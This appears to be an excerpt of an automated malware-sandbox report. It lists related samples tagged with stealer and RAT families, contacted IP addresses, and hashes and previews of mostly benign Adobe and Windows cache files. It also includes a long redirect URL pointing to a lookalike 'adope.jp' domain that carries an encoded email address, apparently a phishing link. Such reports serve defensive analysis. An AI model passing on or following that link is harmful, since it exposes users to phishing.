                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ehttps://www.google.es/url?q=queryrp18(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fpreview.adope.jp%2fod%2f8gqnmo6zgfuuc6sej4k7rfdswihr8l%2fZnJhbnMuZW5nZWxicmVjaHRAYXJkYWdoZ3JvdXAuY29t$?Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 162.125.65.15
                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                      • 202.92.4.57
                                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      • 162.125.65.15
                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                      • 202.92.4.57
                                                                                                                                                                      CloudServices_Slayed.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                      • 162.125.65.15
                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                      • 202.92.4.57
                                                                                                                                                                      CloudServices.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                      • 162.125.65.15
                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                      • 202.92.4.57
                                                                                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                      • 162.125.65.15
                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                      • 202.92.4.57
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 162.125.65.15
                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                      • 202.92.4.57
                                                                                                                                                                      Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                      • 162.125.65.15
                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                      • 202.92.4.57
                                                                                                                                                                      Facebook_Advertiser_Position_Description.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                      • 162.125.65.15
                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                      • 202.92.4.57
                                                                                                                                                                      Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                      • 162.125.65.15
                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                      • 202.92.4.57
                                                                                                                                                                      Facebook_Advertiser_Position_Description.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                      • 162.125.65.15
                                                                                                                                                                      • 162.125.65.18
                                                                                                                                                                      • 202.92.4.57

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      C:\Users\user\AppData\Local\ChromeApplication\DLLs\_bz2.pydx.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                        https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                          SecuriteInfo.com.Win32.Patched.24562.10289.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            SecuriteInfo.com.Win32.Patched.24562.10289.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              SecuriteInfo.com.Win32.Patched.29806.7109.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                electrum-4.5.3-setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  electrum-4.5.3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    C:\Users\user\AppData\Local\ChromeApplication\DLLs\_asyncio.pydx.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                                                                                                                        SecuriteInfo.com.Win32.Patched.24562.10289.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          SecuriteInfo.com.Win32.Patched.24562.10289.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            SecuriteInfo.com.Win32.Patched.29806.7109.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              electrum-4.5.3-setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                electrum-4.5.3.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                  Entropy (8bit):0.8307028593847315
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugk:gJjJGtpTq2yv1AuNZRY3diu8iBVqFK
                                                                                                                                                                                                  MD5:F4DFF305852DD55C400048D4265098A1
                                                                                                                                                                                                  SHA1:4BB84EAD922A3896AED05E6066C6BB335FFB0CBA
                                                                                                                                                                                                  SHA-256:9F88EBA97779482E63A17CC0A5399229C7F6FE64E60FB6E1044AB4C9B789E4B6
                                                                                                                                                                                                  SHA-512:6457109831DFFBF6C447DF4DCE36983F03C175AD61ADF9660C4CDA6B646F366F460AAA8C768A83C9370852381005D8D2DF04E21438BCF8633E71A165BB0CFE2A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x788bbed9, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                  Entropy (8bit):0.658536421644492
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:5SB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:5aza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                  MD5:65512F78C91E597D40F6908C07C9A965
                                                                                                                                                                                                  SHA1:583B2E0EDE7547A78244D67F528D5C8C35D7668E
                                                                                                                                                                                                  SHA-256:3C8362D735D81B14194049DEFE73E6C2CBCE14A3149B8121A12BAF34F74E6CA6
                                                                                                                                                                                                  SHA-512:E87C69A80A3CCA0BD6AF0188724B67D1F36C58D896585F4E8AD262036E4B8489099B872C57E11E24AB97156DEF4A6916E0E12BF276E031373EC9BBEC99004451
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:x...... ...............X\...;...{......................0.z..........{..%....|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................J..!%....|...................Y.T%....|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                  Entropy (8bit):0.07990089197205713
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:80I/8Ye3EbGuAJkhvekl1lAtqttollrekGltll/SPj:80IUz3EbrxlTIqQJe3l
                                                                                                                                                                                                  MD5:142D5AF7AA845F187E996D618DE46307
                                                                                                                                                                                                  SHA1:A5F42E3E1A53AEF7BFAC5ABBBFAB1CC7748A89F2
                                                                                                                                                                                                  SHA-256:56BE39F569421CCA03CB0D5E127B2F6B582D0ECF178122BB85828CBAD0B1A67C
                                                                                                                                                                                                  SHA-512:41C3BA3AAC9D608C97F034DF1361BFA0E44A43212488DB9821F5C2C9F09FDF0CE92212CE4F767E60CE18DF9EAADCB7CEDF913643EEA3BA4AF30251F25E39F8CA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:5........................................;...{..%....|.......{...............{.......{...XL......{...................Y.T%....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                  Entropy (8bit):5.198328612682353
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:HUj3+q2P92nKuAl9OmbnIFUt8YUiZmw+YU+VkwO92nKuAl9OmbjLJ:Zv4HAahFUt8M/+s5LHAaSJ
                                                                                                                                                                                                  MD5:4B780D42E0EC6BCB755E5EDA6B9BDF6E
                                                                                                                                                                                                  SHA1:7A308B7A52D3714F48532931ABE8800F88BA2832
                                                                                                                                                                                                  SHA-256:9F1DF7B70E983492062FCCADF71322535946CF2E3502F1CCF9C0CE3B0DE59256
                                                                                                                                                                                                  SHA-512:70A00AC999712C1445F099B3C29259D11E236337BCE10ED7C8D889378F1052BAC7A6231847C476DD87DDEDA13DE2AD3CCCA1E5D57064637BCD372D6EFDEA0449
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:2024/11/15-03:00:36.551 e68 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/15-03:00:36.554 e68 Recovering log #3.2024/11/15-03:00:36.554 e68 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                  Entropy (8bit):5.198328612682353
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:HUj3+q2P92nKuAl9OmbnIFUt8YUiZmw+YU+VkwO92nKuAl9OmbjLJ:Zv4HAahFUt8M/+s5LHAaSJ
                                                                                                                                                                                                  MD5:4B780D42E0EC6BCB755E5EDA6B9BDF6E
                                                                                                                                                                                                  SHA1:7A308B7A52D3714F48532931ABE8800F88BA2832
                                                                                                                                                                                                  SHA-256:9F1DF7B70E983492062FCCADF71322535946CF2E3502F1CCF9C0CE3B0DE59256
                                                                                                                                                                                                  SHA-512:70A00AC999712C1445F099B3C29259D11E236337BCE10ED7C8D889378F1052BAC7A6231847C476DD87DDEDA13DE2AD3CCCA1E5D57064637BCD372D6EFDEA0449
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:2024/11/15-03:00:36.551 e68 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/15-03:00:36.554 e68 Recovering log #3.2024/11/15-03:00:36.554 e68 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                  Entropy (8bit):5.179167100784755
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:HUj94q2P92nKuAl9Ombzo2jMGIFUt8YUy3JZmw+YUTDkwO92nKuAl9Ombzo2jMmd:e+v4HAa8uFUt8EZ/+95LHAa8RJ
                                                                                                                                                                                                  MD5:F8CBC0B73E3C53B94A5B2B62976FF6DC
                                                                                                                                                                                                  SHA1:9F6A72C80CF413974CA36E3B955DD133FC9EF5FD
                                                                                                                                                                                                  SHA-256:4D00F60A8236835CC2708FD4B1C5513A67D543CC1DF5B545EE3F3EEDC19BC4F4
                                                                                                                                                                                                  SHA-512:36ADCCC06478ABF518AE4C136BB6645561D8EB52F0506632F0333633C060042944019022E2C33DA4442F32A7BF1F796BEA4AF29BD4F3D343FDF3C694C09CA09C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:2024/11/15-03:00:36.617 1c44 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/15-03:00:36.618 1c44 Recovering log #3.2024/11/15-03:00:36.619 1c44 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                  Entropy (8bit):5.179167100784755
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:HUj94q2P92nKuAl9Ombzo2jMGIFUt8YUy3JZmw+YUTDkwO92nKuAl9Ombzo2jMmd:e+v4HAa8uFUt8EZ/+95LHAa8RJ
                                                                                                                                                                                                  MD5:F8CBC0B73E3C53B94A5B2B62976FF6DC
                                                                                                                                                                                                  SHA1:9F6A72C80CF413974CA36E3B955DD133FC9EF5FD
                                                                                                                                                                                                  SHA-256:4D00F60A8236835CC2708FD4B1C5513A67D543CC1DF5B545EE3F3EEDC19BC4F4
                                                                                                                                                                                                  SHA-512:36ADCCC06478ABF518AE4C136BB6645561D8EB52F0506632F0333633C060042944019022E2C33DA4442F32A7BF1F796BEA4AF29BD4F3D343FDF3C694C09CA09C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:2024/11/15-03:00:36.617 1c44 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/15-03:00:36.618 1c44 Recovering log #3.2024/11/15-03:00:36.619 1c44 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\2dade8ef-a7bd-44a2-a64d-69571bd0f476.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):508
                                                                                                                                                                                                  Entropy (8bit):5.055018257017307
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:YH/um3RA8sqnsBdOg2H6caq3QYiubxnP7E4T3OF+:Y2sRdspdMH13QYhbxP7nbI+
                                                                                                                                                                                                  MD5:21193A2F03778BEE80905D773F1ADF52
                                                                                                                                                                                                  SHA1:5D92B9A5C5333FF51E087AD97F132E3BA78709BE
                                                                                                                                                                                                  SHA-256:92838650C4A75D3B601AA4BDFC2FC79806E50479082FAE3B37542457F9880325
                                                                                                                                                                                                  SHA-512:839044096BD8E8E2666C8BB1E2CABCEAC0545FDA5677F443A8A36D9142721C46380504815517B1D7E43CC478B9844CD13BF666409CF2C964B6B98BB60084D0CC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13376217642503485","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":228464},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):508
                                                                                                                                                                                                  Entropy (8bit):5.055018257017307
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:YH/um3RA8sqnsBdOg2H6caq3QYiubxnP7E4T3OF+:Y2sRdspdMH13QYhbxP7nbI+
                                                                                                                                                                                                  MD5:21193A2F03778BEE80905D773F1ADF52
                                                                                                                                                                                                  SHA1:5D92B9A5C5333FF51E087AD97F132E3BA78709BE
                                                                                                                                                                                                  SHA-256:92838650C4A75D3B601AA4BDFC2FC79806E50479082FAE3B37542457F9880325
                                                                                                                                                                                                  SHA-512:839044096BD8E8E2666C8BB1E2CABCEAC0545FDA5677F443A8A36D9142721C46380504815517B1D7E43CC478B9844CD13BF666409CF2C964B6B98BB60084D0CC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13376217642503485","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":228464},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4099
                                                                                                                                                                                                  Entropy (8bit):5.239876352855407
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUIs+LCyZaRt:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLA
                                                                                                                                                                                                  MD5:B03EF8CB19FF8030A1E2613A80EE2352
                                                                                                                                                                                                  SHA1:1BA1F86492321806E7E49696E858FBC0171CDB8F
                                                                                                                                                                                                  SHA-256:4492B2220EB61630398809504E1A216A1930FCDE1617B368565A6AA5AFC49A6C
                                                                                                                                                                                                  SHA-512:64950A54DD150691F020845778BBE697D78695D3FDAF73252BFEB991714D7EB9A9017A261DC9F3F3964C6DFE8F16598A7CA056B040F54E61D679FABDFB0183D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_

                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                                                  Entropy (8bit):5.169260337098897
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:HUml94q2P92nKuAl9OmbzNMxIFUt8YUmXj3JZmw+YUmCEDkwO92nKuAl9OmbzNMT:/l+v4HAa8jFUt8UN/+UCa5LHAa84J
                                                                                                                                                                                                  MD5:62EE5671D10D124F9E4A846C6A359855
                                                                                                                                                                                                  SHA1:01FEE2CE97D0AA78FA6B194DA7D02A49EB5CDED9
                                                                                                                                                                                                  SHA-256:49E9556B05CD96D9F14278293D534ACDF20DD3066785932F9EF60169A2E07960
                                                                                                                                                                                                  SHA-512:12B92B748771BA3922F37CDEB83292F95C09FDBA57B5B3C3BF0F8AE5B9746376C04DC4BE9E6578CB9DE1335EE2AB48975299417079B089172EAC83B4F382CA58
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:2024/11/15-03:00:37.374 1c44 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/15-03:00:37.381 1c44 Recovering log #3.2024/11/15-03:00:37.385 1c44 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                                                  Entropy (8bit):5.169260337098897
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:HUml94q2P92nKuAl9OmbzNMxIFUt8YUmXj3JZmw+YUmCEDkwO92nKuAl9OmbzNMT:/l+v4HAa8jFUt8UN/+UCa5LHAa84J
                                                                                                                                                                                                  MD5:62EE5671D10D124F9E4A846C6A359855
                                                                                                                                                                                                  SHA1:01FEE2CE97D0AA78FA6B194DA7D02A49EB5CDED9
                                                                                                                                                                                                  SHA-256:49E9556B05CD96D9F14278293D534ACDF20DD3066785932F9EF60169A2E07960
                                                                                                                                                                                                  SHA-512:12B92B748771BA3922F37CDEB83292F95C09FDBA57B5B3C3BF0F8AE5B9746376C04DC4BE9E6578CB9DE1335EE2AB48975299417079B089172EAC83B4F382CA58
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:2024/11/15-03:00:37.374 1c44 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/15-03:00:37.381 1c44 Recovering log #3.2024/11/15-03:00:37.385 1c44 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241115080040Z-156.bmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):65110
                                                                                                                                                                                                  Entropy (8bit):1.1217569600910675
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:IMMNvEzMMT9M7ziVkMM1MMMMMMMMxMMM2MMM9MAMMBvMMneMMMzMMMMzMMMOfMQn:TOY
                                                                                                                                                                                                  MD5:4B9C650BD0BCA8ECB718BF230E45A493
                                                                                                                                                                                                  SHA1:8B7C0D60AC3B7CEB8E21C81736F9153A3B835ED7
                                                                                                                                                                                                  SHA-256:88A9087C40E02862B1FBB69BB995341B2F1DDBF91C527BC3552012400FFC16E3
                                                                                                                                                                                                  SHA-512:FF4892383ABE6645FB6983143B549C9548121B2C206DEFF54AE92C49EF9BC90AA6EFCD33B1F8EBBCFE171888B15E0C5A1F9A2677DE7F7743A0B4695059793998
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1391
                                                                                                                                                                                                  Entropy (8bit):7.705940075877404
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                                                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                                                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                                                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                                                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                                                                                                  Malicious:false
